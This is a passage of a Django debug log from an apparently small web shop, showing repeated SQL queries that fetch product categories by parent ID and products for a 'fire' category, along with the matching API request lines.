"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:58:32,087 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:58:32,089 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:58:32,092 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:58:32,095 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:58:32,098 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:58:32,102 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:58:32,105 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:58:32,108 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:58:32,110 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:58:32,113 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:58:32,118 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:58:32,121 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:58:32,124 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:58:32,126 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:58:32,130 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:58:32,134 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:58:32,138 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:58:32,142 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:58:32,146 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:58:32,151 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:58:32,156 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:58:32] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 13:59:21,884 utils 4252 140031721535232 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 13:59:21,890 utils 4252 140031721535232 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 13:59:21] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-18 13:59:34,085 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:59:34,096 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:59:34,102 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:59:34,106 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:59:34,112 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:59:34,116 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:59:34,120 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:59:34,124 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:59:34,127 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:59:34,131 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:59:34,133 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:59:34,135 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:59:34,138 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:59:34,140 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:59:34,145 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:59:34,148 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:59:34,151 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:59:34,154 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:59:34,158 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:59:34,164 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:59:34,167 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:59:34,171 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:59:34,174 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:59:34,178 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:59:34,181 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:59:34,186 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:59:34,189 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:59:34,192 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:59:34,195 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:59:34,197 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:59:34,201 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:59:34,203 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:59:34,205 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:59:34,207 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:59:34,209 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:59:34,213 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:59:34,215 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:59:34,217 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:59:34,219 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:59:34,222 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:59:34,224 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:59:34,227 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:59:34,229 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:59:34,231 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 